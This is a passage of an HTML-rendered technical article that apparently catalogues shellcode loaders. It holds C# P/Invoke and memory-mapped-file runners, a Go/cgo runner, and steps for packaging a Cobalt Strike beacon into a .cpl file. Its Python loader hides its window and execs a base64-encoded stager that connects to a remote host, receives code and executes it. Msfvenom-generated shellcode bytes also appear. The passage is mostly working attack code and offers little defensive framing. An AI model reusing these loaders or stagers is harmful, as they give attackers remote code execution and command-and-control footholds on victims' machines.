            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwFreeType&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadAttributes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwStackSize&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpStartAddress&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;param&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwCreationFlags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="k"&gt;ref&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;lpThreadId&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="kt"&gt;bool&lt;/span&gt; &lt;span class="nf"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;handle&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hHandle&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="n"&gt;dwMilliseconds&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;GetModuleHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;moduleName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;GetProcAddress&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="n"&gt;hModule&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;procName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;LoadLibrary&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="n"&gt;lpFileName&lt;/span&gt;
            &lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nf"&gt;DllImport&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"kernel32"&lt;/span&gt;&lt;span class="p"&gt;)]&lt;/span&gt;
                    &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;extern&lt;/span&gt; &lt;span class="n"&gt;UInt32&lt;/span&gt; &lt;span class="nf"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Python Loader:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;

&lt;span class="n"&gt;whnd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;GetConsoleWindow&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;whnd&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;user32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;ShowWindow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;whnd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;ctypes&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;windll&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;kernel32&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;whnd&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nf"&gt;exec&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;b64decode&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="k"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="nf"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;UTF-8&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)}[&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;version_info&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]](&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4zMCcsODg4OCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Go with Inline C:
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;package&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;

&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"C"&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"unsafe"&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="s"&gt;""&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s"&gt;"xddxc6xd9x74x24xf4x5fx33xc9xb8xb3x5ex2c"&lt;/span&gt;
    &lt;span class="o"&gt;...&lt;/span&gt; &lt;span class="c"&gt;// Additional shellcode bytes omitted&lt;/span&gt;
    &lt;span class="n"&gt;buf&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="s"&gt;"xc9xb1x97x31x47x1ax03x47x1ax83xc7x04xe2"&lt;/span&gt;
    &lt;span class="c"&gt;// at your call site, you can send the shellcode directly to the C&lt;/span&gt;
    &lt;span class="c"&gt;// function by converting it to a pointer of the correct type.&lt;/span&gt;
    &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;call&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;C&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;char&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;unsafe&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Pointer&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])))&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Resource Loading: CPLResourceRunner
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.txt |sed &lt;span class="s1"&gt;'s/[, ]//g; s/0x//g;'&lt;/span&gt; |tr &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'\n'&lt;/span&gt; |xxd &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; |gzip &lt;span class="nt"&gt;-c&lt;/span&gt; |base64 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b64shellcode.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Generate shellcode using Cobalt Strike:&lt;br&gt;
Attacks -&amp;gt; Packages -&amp;gt; Windows Executable (s) -&amp;gt; Output =&amp;gt; RAW (x86)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;py &lt;span class="nt"&gt;-2&lt;/span&gt; ConvertShellcode.py beacon.bin
Shellcode written to shellcode.txt

0x4d,0x5a,0x41,0x52,0x55,0x48,0x89,0xe5,0x48,0x81,0xec,0x20,0x00,0x00,0x00,0x48,0x8d,0x1d,0xea,0xff,0xff,0xff,0x48,0x89,0xdf,0x48,0x81,0xc3,0x7c,0x79,0x01,0x00,0xff,0xd3,0x41,0xb8,0xf0,0xb5,0xa2,0x56,0x68,0x04,0x00,0x00,0x00,0x5a,0x48,0x89,0xf9,0xff,0xd0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xf8,0x00,0x00,0x00,0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd,0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0a,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0xc9,0xdb,0x6e,0xe9,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0x8d,0xba,0x00,0xba,0xeb,0x54,0xd2,0xba,0x15,0xba,0x00,0xba,0x13

&lt;span class="nb"&gt;cat &lt;/span&gt;shellcode.txt |sed &lt;span class="s1"&gt;'s/[, ]//g; s/0x//g;'&lt;/span&gt; |tr &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'n'&lt;/span&gt; |xxd &lt;span class="nt"&gt;-p&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; |gzip &lt;span class="nt"&gt;-c&lt;/span&gt; |base64 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; b64shellcode.txt

H4sIAPGjM14AA/ONcgwK9eh86tH4RoGBgcGjV/bV////PTrvezQerqlkZPh/2XHHh62LwjJYgLJR
Hp0//19ggIEfQMwnv4uPYQvnWcUdjD5nFUMyMosVCory04sScxWSE/Py8ksUklIVikrzFDLzFFz8
&lt;span class="nv"&gt;gxVy81NS9Xi5VKBGnLyd97J3F8MuGH4dcmmXKJAWBgD9vO6hmAAAAA&lt;/span&gt;&lt;span class="o"&gt;==&lt;/span&gt;

Compile to x86 and copy CPLResourceRunner.dll to RunMe.cpl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  PowerShell Loading (MMFml):
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight csharp"&gt;&lt;code&gt;&lt;span class="k"&gt;namespace&lt;/span&gt; &lt;span class="nn"&gt;mmfExeTwo&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.IO.MemoryMappedFiles&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
   &lt;span class="k"&gt;using&lt;/span&gt; &lt;span class="nn"&gt;System.Runtime.InteropServices&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

   &lt;span class="k"&gt;class&lt;/span&gt; &lt;span class="nc"&gt;Program&lt;/span&gt;
   &lt;span class="p"&gt;{&lt;/span&gt;

       &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;delegate&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;NewDelegate&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

       &lt;span class="c1"&gt;// To handle the location by applying the appropriate type&lt;/span&gt;
       &lt;span class="c1"&gt;// We had to create a delegate to handle the the pointer to the location where we shim in the shellcode&lt;/span&gt;
       &lt;span class="c1"&gt;// into the Memory Mapped File.  This allows the location of the opp code to be referenced later for execution&lt;/span&gt;
       &lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;unsafe&lt;/span&gt; &lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="n"&gt;IntPtr&lt;/span&gt; &lt;span class="nf"&gt;GetShellMemAddr&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
       &lt;span class="p"&gt;{&lt;/span&gt;
           &lt;span class="c1"&gt;// 64bit shell code.  Tested on a win10 system.  Injects "cmd -k calc"&lt;/span&gt;
           &lt;span class="c1"&gt;// was generated vanilla using "msfvenom -p windows/exec CMD="cmd /k calc" EXITFUNC=thread C -f powershell"&lt;/span&gt;
           &lt;span class="kt"&gt;var&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="kt"&gt;byte&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;
               &lt;span class="p"&gt;{&lt;/span&gt;
                   &lt;span class="m"&gt;0xfc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x83&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xf0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe8&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x56&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x65&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x60&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x18&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x72&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0f&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xb7&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4a&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x4d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x31&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0xac&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x61&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x7c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x02&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x2c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc9&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x0d&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xe2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xed&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x51&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x52&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x20&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x3c&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x8b&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x80&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x88&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x00&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x85&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xc0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x74&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x67&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x48&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x01&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0xd0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="m"&gt;0x50&lt;/span&gt;&lt;span 